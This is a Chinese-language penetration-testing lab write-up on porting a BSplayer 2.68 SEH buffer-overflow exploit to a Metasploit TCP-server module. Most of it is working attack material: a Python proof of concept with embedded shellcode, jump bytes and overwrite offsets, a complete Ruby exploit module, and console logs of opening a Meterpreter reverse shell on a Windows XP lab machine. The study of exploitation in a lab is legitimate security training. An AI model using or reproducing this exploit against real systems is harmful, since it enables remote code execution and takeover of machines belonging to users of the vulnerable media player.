将 TCP 服务端/基于浏览器的渗透模块导入 Metasploit

一、实验环境

攻击机：

kali 2019-3 (10.10.10.153)

靶机环境：

Windows XP Professional 1 (10.10.10.132)

漏洞：

BSplayer 2.68，下载：https://www.exploit-db.com/exploits/36477/

漏洞源于对远程服务器响应的解析

二、python实现渗透

1、python渗透代码：

    #!/usr/bin/python
    
    ''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
    In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
    address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
    
    Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)
    
    My twitter: @fady_osman
    My youtube: https://www.youtube.com/user/cutehack3r
    '''
    
    import socket
    import sys
    s = socket.socket()         # Create a socket object
    if(len(sys.argv) < 3):
      print "[x] Please enter an IP and port to listen to."
      print "[x] " + sys.argv[0] + " ip port"
      exit()
    host = sys.argv[1]        # Ip to listen to.
    port = int(sys.argv[2])     # Reserve a port for your service.
    s.bind((host, port))        # Bind to the port
    print "[*] Listening on port " + str(port)
    s.listen(5)                 # Now wait for client connection.
    c, addr = s.accept()        # Establish connection with client.
    # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
    print(('[*] Sending the payload first time', addr))
    c.recv(1024)
    #seh and nseh.
    buf =  ""
    buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
    buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
    buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
    buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
    buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
    buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
    buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
    buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
    buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
    buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
    buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
    buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
    buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
    buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
    buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
    buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
    buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
    buf += "\x8c\xcd\x11\xc2\x37\x12"
    
    jmplong = "\xe9\x85\xe9\xff\xff"
    nseh = "\xeb\xf9\x90\x90"
    # Partially overwriting the seh record (nulls are ignored).
    seh = "\x3b\x58\x00\x00"
    buflen = len(buf)
    response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
    c.send(response)
    c.close()
    c, addr = s.accept()        # Establish connection with client.
    # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
    print(('[*] Sending the payload second time', addr))
    c.recv(1024)
    c.send(response)
    c.close()
    s.close()

2、代码简要分析：

• 编写者将ShellCode放置在了2048个NOP之后，不过这并不意味着实际偏移量就是2048——将它放置在SEH覆盖区的前面是因为必须要给ShellCode保留足够的空间。
• \xcc是一个断点操作码，但是在这个渗透模块中，它被用来实现填充
• 变量jmplong中存储了到ShellCode的向后跳转。
• nseh变量中存储了下一帧的地址，也就是我们在上一章中讨论过的短跳转。
• seh变量中保存了P/P/R指令序列的地址。

3、测试

 

•  弹出计算器即成功！

三、创建 Metasploit 模块

1、渗透所需信息

偏移量 2048

已知POP-POP-RETN系列指令/P-P-R在内存中的地址 0x0000583b

向后跳转/到ShellCode的长跳转 \xe9\x85\xe9\xff\xff

短跳转/指向下一个SEH帧的指针 \xeb\xf9\x90\x90

注意点

　　有一点必须要指出：在当前情景中，需要目标计算机主动来连接我们的渗透服务器，而不是我们去连接目标服务器。因此我们的渗透服务器必须时刻对即将到来的连接处于监听状态。当收到目标的请求之后，要向其发送恶意的内容。

2、渗透代码

    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking
      include Msf::Exploit::Remote::TcpServer
      def initialize(info={})
        super(update_info(info,
          'Name' => "BsPlayer 2.68 SEH Overflow Exploit",
          'Description' => %q{
          Here's an example of Server Based Exploit
          },
          'Author' => [ 'z9m8r8' ],
          'Platform' => 'windows',
          'Targets' =>
          [
            [ 'Generic', {'Ret' => 0x0000583b, 'Offset' => 2048} ],
          ],
          'Payload' =>
          {
            'BadChars' => "\x00\x0a\x20\x0d"
          },
        'DisclosureDate' => "10 19 2021",
        'DefaultTarget' => 0))
      end
      def on_client_connect(client)
      return if ((p = regenerate_payload(client)) == nil)
        print_status("Client Connected")
        sploit = make_nops(target['Offset'])
        sploit << payload.encoded
        sploit << "\xcc" * (6787-2048 - payload.encoded.length)
        sploit << "\xe9\x85\xe9\xff\xff"
        sploit << "\xeb\xf9\x90\x90"
        sploit << [target.ret].pack('V')
        client.put(sploit)
        client.get_once
        client.put(sploit)
        handler(client)
        service.close_client(client)
      end
    end

3、代码简要分析

TCP server库提供了处理传入请求所需的各种方法和额外的选项，例如SRVHOST、 SRVPORT和SSL

client.put(sploit)：将恶意数据发送到目标

client.get_once：这个渗透模块需要向目标发送两次数据，所以我们只能在两次发送之间使用client.get_once函数保证数据是分两次发送的，否则这两块数据可能会被合并成一个单元被一起发送出去。

handler(client)：查找从渗透模块传回的会话

代码中使用了client对象。这是因为从指定目标返回的传入请求被看作是一个独立的对象，允许同一时间由多个目标连接

四、msf中测试

1、kali msf操作

    msf5 > use exploit/windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8 
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set srvhost 10.10.10.153
    srvhost => 10.10.10.153
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set srvport 8080
    srvport => 8080
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set lhost  10.10.10.153
    lhost => 10.10.10.153
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > set lport 8888
    lport => 8888
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > exploit 
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    
    [*] Started reverse TCP handler on 10.10.10.153:8888 
    [*] Started service listener on 10.10.10.153:8080 
    [*] Server started.

2、XP端操作

XP启动BSplayer，并打开URL：http://10.10.10.153:8080

•  XP在试图与渗透服务器（kali）建立连接时，Meterpreter攻击载荷就会被发送至XP上，最终kali获得Meterpreter控制

3、kali 端效果：

    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) >
    [*] Client Connected
    [*] Client Connected
    [*] Sending stage (179779 bytes) to 10.10.10.132
    [*] Meterpreter session 1 opened (10.10.10.153:8888 -> 10.10.10.132:1105) at 2021-10-03 05:29:14 -0400
    pwd
    [*] exec: pwd
    
    /root
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                             Connection
      --  ----  ----                     -----------                             ----------
      1         meterpreter x86/windows  WINXP-Z9M8R8-1\z9m8r8 @ WINXP-Z9M8R8-1  10.10.10.153:8888 -> 10.10.10.132:1105 (10.10.10.132)
    
    msf5 exploit(windows/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: WINXP-Z9M8R8-1\z9m8r8
    meterpreter > sysinfo 
    Computer        : WINXP-Z9M8R8-1
    OS              : Windows XP (Build 2600, Service Pack 2).
    Architecture    : x86
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows
    meterpreter >

五、参考文献

《精通Metasploit渗透测试》